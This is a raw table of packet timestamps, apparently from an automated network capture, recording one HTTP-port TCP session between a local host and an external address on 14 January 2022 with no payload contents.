Jan 14, 2022 13:49:25.634780884 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.634804964 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.634829044 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.634829998 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.634851933 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.634876013 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.634892941 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.634898901 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.634922028 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.634943962 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.634944916 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.634968042 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.634974957 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.634990931 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.634999990 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.635013103 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635029078 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.635036945 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635059118 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635062933 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.635082006 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635088921 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.635104895 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635117054 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.635127068 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635149956 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635157108 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.635174036 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635193110 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.635196924 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635220051 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635235071 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.635243893 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635261059 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.635267019 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635289907 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635297060 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.635312080 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635318995 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.635334969 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635343075 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.635358095 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635380030 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.635380030 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635402918 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635416031 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.635426044 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635448933 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635452032 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.635472059 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635490894 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.635494947 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635518074 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635526896 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.635543108 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635555029 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.635565042 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635588884 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635591984 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.635611057 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635620117 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.635636091 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635654926 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.635658979 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635679960 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635695934 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.635703087 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635725021 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635731936 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.635746956 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635767937 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.635768890 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635791063 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635809898 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.635814905 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635838032 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635838985 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.635859013 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635876894 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.635881901 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635905027 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635912895 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.635927916 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635937929 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.635951042 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635973930 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.635976076 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.635996103 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636003971 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.636019945 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636029005 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.636042118 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636065006 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636066914 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.636086941 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636106014 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.636110067 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636132002 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636142015 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.636156082 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636168957 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.636182070 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636205912 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.636208057 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636230946 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636230946 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.636253119 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636255980 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.636276007 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636281013 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.636300087 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636307001 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.636323929 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636332035 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.636348009 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636369944 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636373043 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.636393070 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636408091 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.636415958 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636439085 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636442900 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.636461020 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636481047 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.636483908 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636507034 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636518002 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.636531115 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636545897 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.636553049 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636575937 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636586905 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.636599064 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636620998 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.636621952 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636645079 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636656046 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.636667013 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636691093 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636693954 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.636713982 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636732101 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.636737108 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636759996 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636763096 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.636781931 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636804104 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.636804104 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636826992 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636841059 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.636848927 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636868000 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.636872053 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636893988 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636909008 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.636917114 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636940956 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636944056 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.636962891 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.636981010 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.636986017 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637010098 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637020111 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.637032032 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637051105 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.637056112 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637079000 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637085915 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.637101889 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637113094 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.637125015 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637142897 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.637145996 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637170076 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637177944 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.637192011 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637213945 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.637214899 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637238026 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637253046 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.637259960 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637284040 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637286901 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.637305975 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637327909 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637335062 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.637351036 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637371063 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.637373924 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637394905 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.637396097 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637418985 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637437105 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.637440920 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637465000 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637480021 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.637489080 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637505054 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.637511015 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637536049 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637538910 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.637557983 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637567043 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.637582064 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637589931 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.637604952 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637625933 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.637628078 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637650967 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637661934 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.637675047 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637696981 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637703896 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.637720108 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637739897 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.637742996 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637765884 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637773037 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.637785912 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.637790918 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637809992 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.637814999 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637856007 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.637897015 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.637943983 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.638029099 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.638221025 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.784054995 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.784082890 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.784105062 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.784173012 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.784193993 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.784210920 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.784213066 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.784231901 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.784254074 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.784275055 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.784281969 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.784298897 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.784321070 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.784342051 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.784353018 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.784388065 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.784404039 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.784426928 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.784450054 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.784471035 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.784471989 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.784492016 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.784496069 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.784514904 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.784540892 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.784554005 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.784563065 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.784601927 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.784625053 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.784626007 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.784648895 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.784670115 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.784671068 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.784693003 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.784714937 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.784717083 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.784760952 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.784804106 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.784804106 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.784825087 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.784862995 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.785022974 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.788384914 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.788475037 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.931133986 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931169033 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931185961 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931210995 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931236029 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931257963 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931271076 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.931283951 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931308985 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931317091 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.931333065 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931339025 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.931359053 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931368113 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.931381941 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931399107 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.931405067 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931412935 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.931430101 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931441069 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.931453943 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931468964 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.931477070 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931493044 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.931499958 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931525946 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931530952 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.931550026 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931566954 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.931571960 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931597948 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931600094 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.931622982 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931637049 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.931646109 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931670904 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931672096 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.931694984 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931704998 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.931720018 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931726933 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.931742907 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931752920 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.931766987 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931775093 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.931790113 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931798935 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.931814909 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931821108 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.931838989 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931847095 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.931863070 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931868076 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.931886911 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931894064 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.931910992 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931915045 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.931936026 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931940079 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.931962013 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931966066 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.931984901 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.931988955 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932008982 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932012081 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932034016 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932041883 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932055950 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932065010 CET	49743	80	192.168.2.3	108.167.165.140
